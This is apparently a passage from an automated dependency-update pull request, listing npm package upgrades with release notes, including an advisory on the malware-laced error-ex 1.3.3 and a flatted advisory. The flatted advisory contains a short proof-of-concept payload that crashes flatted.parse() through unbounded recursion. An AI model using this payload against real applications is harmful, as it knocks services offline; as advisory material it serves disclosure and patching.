No, it shouldn't be breaking. The package on npm shouldn't be affected (aside from this patch release) and any references to the old repository should automatically redirect.

Thus, according to all of the "APIs" (loosely put) involved, nothing should have broken.

I understand there are a lot of edge cases so please open issues as needed so I can assist in any way necessary.

Q: Why was the repository transferred?

I'll just list them off in no particular order.

  • The old organization was defunct and abandoned.
  • I was not an owner of the old organization and thus could not ban the non-trivial amount of spam users or the few truly abusive users from the org. This hindered my ability to properly maintain this package.
  • The debug ecosystem intends to grow beyond a single package, and since new packages could not be created in the old org (nor did it make sense for them to live there), a new org made the most sense - especially from a security point of view.
  • The old org has way, way too many approved members with push access, for which there was nothing I could do. This presented a pretty sizable security risk given that many packages in recent years have fallen victim to backdoors and the like due to lax security access.

Q: Was this approved?

Yes.[archive]

Q: Do I need to worry about another migration sometime in the future?

No.

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 26 commits:

โ†—๏ธ deep-is (indirect, 0.1.3 โ†’ 0.1.4) ยท Repo

Commits

See the full diff on Github. The new version differs by 3 commits:

โ†—๏ธ define-properties (indirect, 1.1.3 โ†’ 1.2.1) ยท Repo ยท Changelog

Release Notes

1.2.1 (from changelog)

Commits

  • [Refactor] use define-data-property e7782a7
  • [actions] use reusable rebase action cd249c3
  • [Dev Deps] update @ljharb/eslint-config, aud, tape 8205f97

1.2.0 (from changelog)

Commits

  • [New] if the predicate is boolean true, it compares the existing value with === as the predicate d8dd6fc
  • [meta] add auto-changelog 7ebe2b0
  • [meta] use npmignore to autogenerate an npmignore file 647478a
  • [Dev Deps] update @ljharb/eslint-config, aud, tape e620d70
  • [Dev Deps] update aud, tape f1e5072
  • [actions] update checkout action 628b3af

1.1.4 (from changelog)

  • [Refactor] use has-property-descriptors
  • [readme] add github actions/codecov badges
  • [Docs] fix header parsing; remove testling
  • [Deps] update object-keys
  • [meta] use prepublishOnly script for npm 7+
  • [meta] add funding field; create FUNDING.yml
  • [actions] add "Allow Edits" workflow; automatic rebasing / merge commit blocking
  • [actions] reuse common workflows
  • [actions] update codecov uploader
  • [actions] use node/install instead of node/run; use codecov action
  • [Tests] migrate tests to Github Actions
  • [Tests] run nyc on all tests; use tape runner
  • [Tests] use shared travis-ci config
  • [Tests] use npx aud instead of nsp or npm audit with hoops
  • [Tests] remove jscs
  • [Dev Deps] update eslint, @ljharb/eslint-config, safe-publish-latest, tape; add aud, safe-publish-latest

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ‰๏ธ doctrine (downgrade, 3.0.0 โ†’ 2.1.0) ยท Repo ยท Changelog

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ electron-to-chromium (indirect, 1.3.799 โ†’ 1.5.313) ยท Repo ยท Changelog

Commits

See the full diff on Github. The new version differs by 2 commits:

โ†—๏ธ enhanced-resolve (indirect, 0.9.1 โ†’ 5.20.0) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ env-editor (indirect, 0.4.2 โ†’ 1.3.0) ยท Repo

Release Notes

1.3.0

v1.2.0...v1.3.0

1.2.0

  • Add support for Visual Studio Code - Insiders db5f1b8
  • Add vi as keyword for Vim editor d525056

v1.1.0...v1.2.0

1.1.0

v1.0.0...v1.1.0

1.0.0

Breaking

v0.5.0...v1.0.0

0.5.0

v0.4.2...v0.5.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 13 commits:

โ†—๏ธ error-ex (indirect, 1.3.2 โ†’ 1.3.4) ยท Repo

Security Advisories ๐Ÿšจ

๐Ÿšจ error-ex@1.3.3 contains malware after npm account takeover

Impact

On 8 September 2025, an npm publishing account for error-ex was taken over after a phishing attack. Version 1.3.3 was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.

Local environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct <script> inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.

The malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.

Patches

npm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.

On 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.

Users should update to the latest patch version, completely remove their node_modules directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.

Those operating private registries or registry mirrors should purge the offending versions from any caches.

References

Point of Contact

In the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see Patches above), please reach out via one of the following channels of communication:

Release Notes

1.3.4

Functionally identical release to 1.3.2.

Version 1.3.3 is compromised. Please see debug-js/debug#1005.

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 3 commits:

โ†—๏ธ es-abstract (indirect, 1.18.5 โ†’ 1.24.1) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ es-to-primitive (indirect, 1.2.1 โ†’ 1.3.0) ยท Repo ยท Changelog

Release Notes

1.3.0 (from changelog)

Commits

  • [actions] reuse common workflows bb72efc
  • [Tests] use es-value-fixtures a912f7b
  • [Tests] migrate tests to Github Actions 510baf0
  • [New] add types 69ba1fd
  • [meta] remove unused Makefile 4ea66e6
  • [actions] use node/install instead of node/run; use codecov action 3c31937
  • [meta] do not publish github action workflow files 389567e
  • [meta] use npmignore to autogenerate an npmignore file 9f3aa76
  • [actions] split out node 10-20, and 20+ c60d7d8
  • [Tests] run nyc on all tests; use tape runner 29cbb89
  • [meta] add auto-changelog ea744b2
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, function.prototype.name, has-symbols, object-inspect, object-is, tape e5c3c79
  • [actions] add automatic rebasing / merge commit blocking a5a6f00
  • [Dev Deps] update @ljharb/eslint-config, es-value-fixtures, function.prototype.name, npmignore, object-inspect, object-is, tape 7941fd5
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, es-value-fixtures, foreach, object-inspect, tape eb1c79c
  • [Dev Deps] update eslint, @ljharb/eslint-config, function.prototype.name, object-inspect, safe-publish-latest, tape 249b42f
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, function.prototype.name, object-inspect, object-is, tape d57d5e9
  • [actions] update codecov uploader 003b62c
  • [actions] add "Allow Edits" workflow 75ee990
  • [Dev Deps] update eslint, @ljharb/eslint-config, tape, object-is; add safe-publish-latest ba5da7b
  • [readme] remove travis badge 6f7aec7
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, object-inspect, tape 3291fd5
  • [Dev Deps] update eslint, @ljharb/eslint-config, function.prototype.name, has-symbols, object-inspect 53007f2
  • [actions] update checkout action 69640db
  • [Dev Deps] update eslint, @ljharb/eslint-config, object-is, tape; add aud c9d644e
  • [Tests] use for-each instead of foreach e9117bb
  • [readme] add github actions/codecov badges 53cd375
  • [Deps] update is-callable, is-date-object, is-symbol 8116c68
  • [Tests] fix test skipping for Symbol.toPrimitive e6268ef
  • [actions] switch Automatic Rebase workflow to pull_request_target event da41c40
  • [Deps] update is-callable, is-date-object 96fe13f
  • [Tests] replace aud with npm audit 0b53154
  • [meta] use prepublishOnly script for npm 7+ 9d7d485
  • [Deps] update is-callable 3c990b6
  • [Deps] update is-callable 9bcfff2
  • [Deps] update is-callable 1eb5478
  • [meta] only run aud on prod deps 1fcd896
  • [Deps] update is-symbol 7174a47

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 39 commits:

โ†—๏ธ escalade (indirect, 3.1.1 โ†’ 3.2.0) ยท Repo

Release Notes

3.2.0

Patches

  • Declare separate ESM and CommonJS TypeScript definitions: a72e1c3
    Previously, only ESM definitions were shipped but were exported in a way that could cause tool/resolution ambiguity.

Chores

  • Update Node.js version matrix in CI suite: a8c6820

Full Changelog: v3.1.2...v3.2.0

3.1.2

Patches

Chores

Full Changelog: v3.1.1...v3.1.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ eslint (indirect, 7.32.0 โ†’ 9.39.4) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 10 commits:

โ†—๏ธ eslint-formatter-pretty (indirect, 4.1.0 โ†’ 7.0.0) ยท Repo

Release Notes

7.0.0

Breaking

Improvements

  • Add universal hyperlinks for filename headers 206879b

v6.0.1...v7.0.0

6.0.1

v6.0.0...v6.0.1

6.0.0

Breaking

v5.0.0...v6.0.0

5.0.0

Breaking

Improvements

v4.1.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 14 commits:

โ†—๏ธ eslint-plugin-unicorn (indirect, 35.0.0 โ†’ 63.0.0) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ eslint-rule-docs (indirect, 1.1.231 โ†’ 1.1.235) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ eslint-scope (indirect, 5.1.1 โ†’ 8.4.0) ยท Repo ยท Changelog

Release Notes

8.0.2

8.0.2 (2024-07-08)

Bug Fixes

  • Definition#name in catch patterns should be Identifier node (#127) (8082caa)

8.0.1

8.0.1 (2024-03-20)

Documentation

Chores

  • switch to eslint flat config (#121) (59b1606)
  • upgrade espree@10.0.1, eslint-visitor-keys@4.0.0 (#119) (6f95a94)

8.0.0

8.0.0 (2024-01-04)

โš  BREAKING CHANGES

  • use ESTree directive property when searching for "use strict" (#118)
  • class extends is evaluated in the class scope (#116)
  • Require Node.js ^18.18.0 || ^20.9.0 || >=21.1.0 (#115)

Features

  • Require Node.js ^18.18.0 || ^20.9.0 || >=21.1.0 (#115) (ed67857)
  • use ESTree directive property when searching for "use strict" (#118) (23fe81f)

Bug Fixes

  • class extends is evaluated in the class scope (#116) (42ef7a9)

Documentation

Chores

7.2.2

7.2.2 (2023-07-27)

Chores

7.2.1

7.2.1 (2023-05-31)

Chores

7.2.0

Features

  • 70c8db1 feat: Add isGlobalReturn method on scopeManager. (#96) (Nicholas C. Zakas)

Documentation

  • 25abacf docs: add badges (#89) (Milos Djermanovic)

Build Related

  • a8811b8 build: add node v18 (#91) (ๅ”ฏ็„ถ)

Chores

  • 3dbad80 chore: add triage action (#95) (Milos Djermanovic)
  • 34ffedc ci: add Node v19 (#94) (Milos Djermanovic)
  • 4c00534 ci: update Github actions (#93) (Deepshika S)
  • 6c8ccf2 chore: add funding field (#92) (Deepshika S)

7.1.1

Bug Fixes

  • 4e1d24c fix: ignore "use strict" directives in ES3 (#87) (Milos Djermanovic)

Chores

  • 8938109 chore: upgrade espree@9.3.1 eslint-visitor-keys@3.3.0 (#88) (Milos Djermanovic)
  • ceb8bdd ci: use node v16 (#84) (Nitin Kumar)
  • 62e147b test: add tests with year-based ecmaVersion (#83) (Milos Djermanovic)

7.1.0

Features

  • d756f1e feat: Add sourceType:commonjs support (#81) (Nicholas C. Zakas)

7.0.0

Breaking Changes

  • 22a55c0 feat!: support class static blocks (#80) (Milos Djermanovic)

Build Related

  • 4aafb61 build: upgrade eslint-release to v3.2.0 to support conventional commits (#79) (Milos Djermanovic)
  • 263c762 Build: add node v17 (#76) (ๅ”ฏ็„ถ)

6.0.0

  • 4ee1d80 Fix: Ensure correct version in package (#73) (Nicholas C. Zakas)
  • 82a7e6d Breaking: Switch to ESM (fixes #70) (#71) (Brett Zamir)
  • 0b4a5f1 Update: support class fields (refs eslint/eslint#14343) (#69) (Toru Nagashima)
  • 39f8cfc Chore: upgrade estraverse to version 5 (#68) (Rouven WeรŸling)
  • ae27ff3 Docs: Add range to espree options in README (fixes #66) (#67) (Alan Liang)

Does any of this look wrong? Please let us know.

โ†—๏ธ eslint-visitor-keys (indirect, 2.1.0 โ†’ 5.0.1) ยท Repo ยท Changelog

Release Notes

5.0.1

4.0.0

4.0.0 (2024-02-08)

โš  BREAKING CHANGES

  • Require Node.js ^18.18.0 || ^20.9.0 || >=21.1.0 (#63)

Features

  • Require Node.js ^18.18.0 || ^20.9.0 || &gt;=21.1.0 (#63) (388b2ac)

Chores

3.4.3

3.4.3 (2023-08-08)

Chores

3.4.2

3.4.2 (2023-07-27)

Documentation

Chores

3.4.1

3.4.1 (2023-05-05)

Bug Fixes

  • correct types for node16 resolution (#47) (7bd1fc1)

Chores

3.4.0

Features

  • 6ece4bd feat: add JSXSpreadChild and tool to build keys out of AST definitions (#36) (Brett Zamir)

Bug Fixes

  • e9a070f fix: remove useless sourcemap url (fixes #43) (#44) (ไฝ™่…พ้–)

Documentation

  • 4beb7a7 docs: update badges (#37) (Milos Djermanovic)

Build Related

  • 81c0732 build: add node v18 (#39) (ๅ”ฏ็„ถ)

Chores

  • 0398109 chore: add triage action (#42) (Milos Djermanovic)
  • bcffbe5 ci: add Node v19 (#41) (Milos Djermanovic)
  • c24f2e4 chore: update github actions and add funding field (#40) (Deepshika S)

3.3.0

Features

  • 7f10327 feat: Bundle JSDoc-built TypeScript declaration file (#34) (Brett Zamir)

3.2.0

Features

  • 5c53218 feat: add missing JSXOpeningFragment and JSXClosingFragment (#33) (Richard Huang)

Documentation

  • 2a5c9a6 docs: readme add syntax highlighting (#32) (coderaiser)

3.1.0

Enhancements

  • 5f5b232 Update: add StaticBlock (#29) (Milos Djermanovic)

Documentation

  • 7b756cd Docs: Update the minimum Node.js version requirement (#26) (0uep)

Build Related

  • 5e3e687 build: upgrade eslint-release to v3.2.0 to support conventional commits (#31) (Milos Djermanovic)
  • 53d3939 Build: add node v17 (#30) (ๅ”ฏ็„ถ)

Chores

  • e89bff9 Chore: use actions/setup-node@v2 (่–›ๅฎš่ฐ”็š„็Œซ)

3.0.0

  • 701b67d Breaking: drop node v10/v13/v15 (refs eslint/eslint#14023) (#23) (่–›ๅฎš่ฐ”็š„็Œซ)
  • f584b12 Breaking: Switch to ESM (#24) (Brett Zamir)
  • 7279e73 Build: Update branch reference in CI (#25) (Milos Djermanovic)
  • c6846d6 Upgrade: eslint-release (#21) (Nicholas C. Zakas)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ espree (indirect, 7.3.1 โ†’ 11.2.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

โ†—๏ธ espurify (indirect, 2.1.1 โ†’ 3.2.0) ยท Repo ยท Changelog

Release Notes

3.2.0 (from changelog)

Features

3.1.0 (from changelog)

Features

3.0.0 (from changelog)

Features

Breaking Changes

This release will not affect most users immediately. There are three notable changes.

  1. espurify function is still exported as default but deprecated in favor of named exports aiming ESM era, and will be removed in future major releases. Please use espurify.purifyAst instead.

  2. espurify.cloneWithWhitelist is still exported but deprecated in favor of more inclusive language and will be removed in future major releases. Please use espurify.cloneWithAllowlist instead.

  3. Some new properties will appear in purified AST and may affect deep-equality of the tree, since default ecmaVersion is changed from 2018 to 2022 which add some properties to existing Nodes.

-  CallExpression: ['type', 'callee', 'arguments'],
+  CallExpression: ['type', 'callee', 'arguments', 'optional'],
-  ExportAllDeclaration: ['type', 'source'],
+  ExportAllDeclaration: ['type', 'source', 'exported'],
-  Literal: ['type', 'value', 'regex'],
+  Literal: ['type', 'value', 'regex', 'bigint'],

To make espurify's behavior same as v2, please use espurify.customize function with ecmaVersion: 2018 option.

const purify = espurify.customize({ ecmaVersion: 2018 });
const clonedAst = purify(originalAst);

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ esquery (indirect, 1.4.0 โ†’ 1.7.0) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ estraverse (indirect, 4.3.0 โ†’ 5.3.0) ยท Repo

Commits

See the full diff on Github. The new version differs by 9 commits:

โ†—๏ธ execa (indirect, 5.1.1 โ†’ 9.6.1) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ fast-glob (indirect, 3.2.7 โ†’ 3.3.3) ยท Repo

Release Notes

3.3.3

Full Changelog: 3.3.2...3.3.3

๐Ÿ’ฌ Common

๐Ÿ› Bug fixes

  • Apply absolute negative patterns to full path instead of file path (#441, thanks @webpro)

3.3.2

Full Changelog: 3.3.1...3.3.2

๐Ÿ› Bug fixes

  • Handle square brackets as a special character on Windows in escape functions (#425)
  • Keep escaping after brace expansion (#422)

3.3.1

Full Changelog: 3.3.0...3.3.1

This release fixes a regression for cases where the ignore option is used with a string (#403, #404).

The public interface of this package does not support a string as the value for the ignore option since 2018 year (release).

So, in the next major release, we will reintroduce method implementations that do not involve strings in the ignore option.

3.3.0

Full Changelog: 3.2.12...3.3.0

๐Ÿš€ Improvements

Method aliases

New methods (glob, globSync, globStream) have been added in addition to the current methods (default import, sync, stream), which eliminate the need to rename the method when importing. In addition, an async alias has been added for the default import, which makes it possible to use this packet with ESM.

Method to convert paths to globs

A new method (convertPathToPattern) has been added in this release to convert a path to a pattern. The primary goal is to enable users to avoid processing Windows paths in each location where this package is used by utilities from third-party packages.

See more details in the pull request.

๐Ÿ› Bug fixes

  • In the past, we mishandled patterns that contained slashes when the baseNameMatch option was enabled, which went against the documented behavior. (#312)
  • Several problems with matching patterns that contain brace expansion have been resolved. The primary issue solved is when the pattern has duplicate slashes after it is expanded (#394), or the micromatch package does not correctly generate a regular expression (#365).
  • All negative patterns will now have the dot option enabled when matching paths. Previously, the !**/* patterns did not exclude hidden files (start with a dot). (#343)
  • The issue that led to duplicates in the results when overlapping or duplicate patterns were present among the patterns has been fixed. At the moment, we are only talking about leading dot. Other cases are not included. For example, running with the patterns ['./file.md', 'file.md', '*'] will now only include file.md once in the results. (#190)

๐Ÿ“– Documentation

A clarifying note has been added for the concurrency option, which provides more detailed information about the Thread Pool utilization.

โš™๏ธ Infrastructure

  • The benchmark in CI is now running on Node.js 20.
  • The benchmark now uses the public package bencho instead of an in-house implementation. You may want to try this solution for your packages and provide feedback.

๐Ÿฅ‡ New Contributors

3.2.12

Full Changelog: 3.2.11...3.2.12

๐Ÿ› Bug fixes

Fixed an issue introduced in 3.2.7 related to incorrect application of patterns to entries with a trailing slash when the entry is not a directory.

Before changes:

fg.sync('**/!(*.md)')
// ['file.md', 'a/file.md', 'a/file.txt']

After fix:

fg.sync('**/!(*.md)')
// ['a/file.txt']

Thanks @AgentEnder for the issue (#357).

๐Ÿš€ Improvements

This release includes performance improvements for the asynchronous method. For this method we now use an asynchronous directory traversal interface instead of using a streaming interface. This gives up to 15% acceleration for medium and large directories. The result depends a lot on hardware.

You can find the benchmark results for this release in CI here.

Here are a few of measurements on my laptop:

===> Benchmark pattern "*" with 100 launches (regression, async)
===> Max stdev: 7 | Retries: 3 | Options: {}

Name                   Time, ms  Time stdev, %  Memory, MB  Memory stdev, %  Entries  Errors  Retries
---------------------  --------  -------------  ----------  ---------------  -------  ------  -------
fast-glob-current.js   4.390     0.252          6.253       0.015            4        0       1
fast-glob-previous.js  5.653     0.633          6.051       0.056            4        0       1

===> Benchmark pattern "**" with 100 launches (regression, async)
===> Max stdev: 7 | Retries: 3 | Options: {}

Name                   Time, ms  Time stdev, %  Memory, MB  Memory stdev, %  Entries  Errors  Retries
---------------------  --------  -------------  ----------  ---------------  -------  ------  -------
fast-glob-current.js   34.587    1.287          10.654      0.607            11835    0       1
fast-glob-previous.js  41.972    2.086          10.236      1.224            11835    0       1

3.2.11

Full Changelog: 3.2.10...3.2.11

๐Ÿ› Bug fixes

Yeap, this is another release aimed at fixing problems with detecting brace expansions in patterns. This time, patterns like abc/{a.txt,b.js} was not marked as a dynamic pattern. So, now the regex has been rewritten to a generalized solution as a function to avoid future problems due to the complexity of the regular expression.

Thanks @MurzNN for the report of this problem (#351).

3.2.10

Full Changelog: 3.2.9...3.2.10

๐Ÿ› Bug fixes

  • Fixed a regression in 3.2.8 when the {a,b,c} pattern no longer considered a dynamic pattern (thanks @amitdahan, #347).

๐Ÿฅ‡ New Contributors

3.2.9

Full Changelog: 3.2.8...3.2.9

๐Ÿ› Bug fixes

  • Fixed a regression in 3.2.8 with invalid regular expression on older node.js versions (#345).

3.2.8

Full Changelog: 3.2.7...3.2.8

๐Ÿ› Bug fixes

Fix directory matching with trailing slashes (#290)

Thanks @Trott for investigating the problem and the detailed description.

Previously the src/*/ pattern did not work as expected (like src/*).

Double-slash in the middle of the pattern is not collapsed (#330)

Starting from this release, patterns like src//* will work like similar patterns without duplicate slashes. This was done for continuity with other solutions (glob, ls src//*, python, golang, โ€ฆ).

Adjust inefficient regular expressions (#336, #342, #344)

Thanks @Trott for fixing bugs and @XhmikosR for adding the CodeQL action to CI pipeline.

๐Ÿ“– Documentation

โš™๏ธ Infrastructure

๐Ÿฅ‡ New Contributors

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ fastq (indirect, 1.11.1 โ†’ 1.20.1) ยท Repo

Release Notes

1.20.1

What's Changed

  • chore(package): explicitly declare js module type by @Fdawgs in #95
  • feat: migrate from StandardJS to ESLint with neostandard by @mcollina in #98
  • feat: add abort() method to settle pending tasks by @mcollina in #101

New Contributors

Full Changelog: v1.19.1...v1.20.1

1.19.1

What's Changed

New Contributors

  • @qpwo made their first contribution in #92

Full Changelog: v1.19.0...v1.19.1

1.19.0

What's Changed

New Contributors

Full Changelog: v1.18.0...v1.19.0

1.18.0

What's Changed

  • fix: ensure drained() resolves after async tasks complete by @todoroff in #89

New Contributors

Full Changelog: v1.17.1...v1.18.0

1.17.1

What's Changed

  • Emit drain event after pause/resume combo by @mcollina in #82

Full Changelog: v1.17.0...v1.17.1

1.17.0

What's Changed

New Contributors

Full Changelog: v1.15.0...v1.17.0

1.16.0

What's Changed

New Contributors

Full Changelog: v1.15.0...v1.16.0

1.15.0

What's Changed

  • fix: queueAsPromised.drained() resolves while queue is idle by @0xOlias in #64

New Contributors

Full Changelog: v1.14.0...v1.15.0

1.14.0

What's Changed

New Contributors

Full Changelog: v1.13.0...v1.14.0

1.13.0

What's Changed

New Contributors

Full Changelog: v1.12.0...v1.13.0

1.12.0

What's Changed

Full Changelog: v1.11.1...v1.12.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 37 commits:

โ†—๏ธ file-entry-cache (indirect, 6.0.1 โ†’ 8.0.0) ยท Repo ยท Changelog

Release Notes

8.0.0

Removing support for Nodejs 10, 12, and 14

This is updating modules to the latest versions and supporting Nodejs >=16 moving forward with v8.0.0

What's Changed

Full Changelog: v7.0.2...v8.0.0

7.0.2

What's Changed

Full Changelog: v7.0.1...v7.0.2

7.0.1

What's Changed

Full Changelog: v7.0.0...v7.0.1

7.0.0

What's Changed

Full Changelog: v6.0.1...v7.0.0

Does any of this look wrong? Please let us know.

โ†—๏ธ fill-range (indirect, 7.0.1 โ†’ 7.1.1) ยท Repo

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ flat-cache (indirect, 3.0.4 โ†’ 4.0.1) ยท Repo ยท Changelog

Release Notes

4.0.1

What's Changed

New Contributors

Full Changelog: v4.0.0...v4.0.1

4.0.0

Major version release

To stay up to date with latest module dependencies we moved to supporting nodejs >=16 with this release. All other functionality stayed the same.

What's Changed

Full Changelog: v3.2.0...v4.0.0

3.2.0

What's Changed

New Contributors

Full Changelog: v3.1.1...v3.2.0

3.1.1

What's Changed

New Contributors

Full Changelog: v3.0.4...v3.1.1

Does any of this look wrong? Please let us know.

โ†—๏ธ flatted (indirect, 3.2.2 โ†’ 3.4.1) ยท Repo

Security Advisories ๐Ÿšจ

๐Ÿšจ flatted vulnerable to unbounded recursion DoS in parse() revive phase

Summary

flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.

Impact

Denial of Service (DoS). Any application that passes untrusted input to flatted.parse() can be crashed by an unauthenticated attacker with a single request.

flatted has ~87M weekly npm downloads and is used as the circular-JSON serialization layer in many caching and logging libraries.

Proof of Concept

const flatted = require('flatted');

// Build deeply nested circular reference chain
const depth = 20000;
const arr = new Array(depth + 1);
arr[0] = '{"a":"1"}';
for (let i = 1; i <= depth; i++) {
  arr[i] = `{"a":"${i + 1}"}`;
}
arr[depth] = '{"a":"leaf"}';

const payload = JSON.stringify(arr);
flatted.parse(payload); // RangeError: Maximum call stack size exceeded

Fix

The maintainer has already merged an iterative (non-recursive) implementation in PR #88, converting the recursive revive() to a stack-based loop.

Affected Versions

All versions prior to the PR #88 fix.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ function-bind (indirect, 1.1.1 โ†’ 1.1.2) ยท Repo ยท Changelog

Commits

See the full diff on Github. The new version differs by 26 commits:

โ†—๏ธ get-intrinsic (indirect, 1.1.1 โ†’ 1.3.0) ยท Repo ยท Changelog

Release Notes

1.3.0 (from changelog)

Commits

  • [Dev Deps] update es-abstract, es-value-fixtures, for-each, object-inspect 9b61553
  • [Deps] update call-bind-apply-helpers, es-object-atoms, get-proto a341fee
  • [New] add Float16Array de22116

1.2.7 (from changelog)

Commits

  • [Refactor] use get-proto directly 00ab955
  • [Deps] update math-intrinsics c716cdd
  • [Dev Deps] update call-bound, es-abstract dc648a6

1.2.6 (from changelog)

Commits

  • [Refactor] use math-intrinsics 841be86
  • [Refactor] use es-object-atoms 42057df
  • [Deps] update call-bind-apply-helpers 45afa24
  • [Dev Deps] update call-bound 9cba9c6

1.2.5 (from changelog)

Commits

  • [actions] split out node 10-20, and 20+ 6e2b9dd
  • [Refactor] use dunder-proto and call-bind-apply-helpers instead of has-proto c095d17
  • [Refactor] use gopd 9841d5b
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, es-abstract, es-value-fixtures, gopd, mock-property, object-inspect, tape 2d07e01
  • [Deps] update gopd, has-proto, has-symbols, hasown 974d8bf
  • [Dev Deps] update call-bind, es-abstract, tape df9dde1
  • [Refactor] cache es-define-property as well 43ef543
  • [Deps] update has-proto, has-symbols, hasown ad4949d
  • [Tests] use call-bound directly ad5c406
  • [Deps] update has-proto, hasown 45414ca
  • [Tests] replace aud with npm audit 18d3509
  • [Deps] update es-define-property aadaa3b
  • [Dev Deps] add missing peer dep c296a16

1.2.4 (from changelog)

Commits

  • [Refactor] use all 7 <+ ES6 Errors from es-errors bcac811

1.2.3 (from changelog)

Commits

  • [Refactor] use es-errors, so things that only need those do not need get-intrinsic f11db9c
  • [Dev Deps] update aud, es-abstract, mock-property, npmignore b7ac7d1
  • [meta] simplify exports faa0cc6
  • [meta] add missing engines.node 774dd0b
  • [Dev Deps] update tape 5828e8e
  • [Robustness] use null objects for lookups eb9a11f
  • [meta] add sideEffects flag 89bcc7a

1.2.2 (from changelog)

Commits

  • [Dev Deps] update @ljharb/eslint-config, aud, call-bind, es-abstract, mock-property, object-inspect, tape f51bcf2
  • [Refactor] use hasown instead of has 18d14b7
  • [Deps] update function-bind 6e109c8

1.2.1 (from changelog)

Commits

  • [Fix] avoid a crash in envs without __proto__ 7bad8d0
  • [Dev Deps] update es-abstract c60e6b7

1.2.0 (from changelog)

Commits

  • [actions] update checkout action ca6b12f
  • [Dev Deps] update @ljharb/eslint-config, es-abstract, object-inspect, tape 41a3727
  • [Fix] ensure Error.prototype is undeniable c511e97
  • [Dev Deps] update aud, es-abstract, tape 1bef8a8
  • [Dev Deps] update aud, es-abstract 0d41f16
  • [New] add BigInt64Array and BigUint64Array a6cca25
  • [Tests] use gopd ecf7722

1.1.3 (from changelog)

Commits

  • [Dev Deps] update es-abstract, es-value-fixtures, tape 07ff291
  • [Fix] properly check for % signs 50ac176

1.1.2 (from changelog)

Fixed

  • [Fix] properly validate against extra % signs #16

Commits

  • [actions] reuse common workflows 0972547
  • [meta] use npmignore to autogenerate an npmignore file 5ba0b51
  • [actions] use node/install instead of node/run; use codecov action c364492
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, es-abstract, object-inspect, tape dc04dad
  • [Dev Deps] update eslint, @ljharb/eslint-config, es-abstract, object-inspect, safe-publish-latest, tape 1c14059
  • [Tests] use mock-property b396ef0
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, object-inspect, tape c2c758d
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, es-abstract, es-value-fixtures, object-inspect, tape 29e3c09
  • [actions] update codecov uploader 8cbc141
  • [Dev Deps] update @ljharb/eslint-config, es-abstract, es-value-fixtures, object-inspect, tape 10b6f5c
  • [readme] add github actions/codecov badges 4e25400
  • [Tests] use for-each instead of foreach c05b957
  • [Dev Deps] update es-abstract 29b05ae
  • [meta] use prepublishOnly script for npm 7+ 95c285d
  • [Deps] update has-symbols 593cb4f
  • [readme] fix repo URLs 1c8305b
  • [Deps] update has-symbols c7138b6
  • [Dev Deps] remove unused has-bigints bd63aff

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 75 commits:

โ†—๏ธ get-stream (indirect, 6.0.1 โ†’ 9.0.1) ยท Repo

Release Notes

9.0.1

  • Upgrade ReadableStream[Symbol.asyncIterator] ponyfill (#128) df42674

v9.0.0...v9.0.1

9.0.0

Breaking

Improvements

v8.0.1...v9.0.0

8.0.1

Fixes

v8.0.0...v8.0.1

8.0.0

Huge thanks to @ehmicky for doing all the work for this release ๐Ÿ™Œ

Breaking

Improvements

Fixes

TypeScript types

Documentation

Performance

  • Do not block the event loop when the stream ends. (#92)

v7.0.1...v8.0.0

7.0.1

  • Work around issue with handling large sizes e58d141

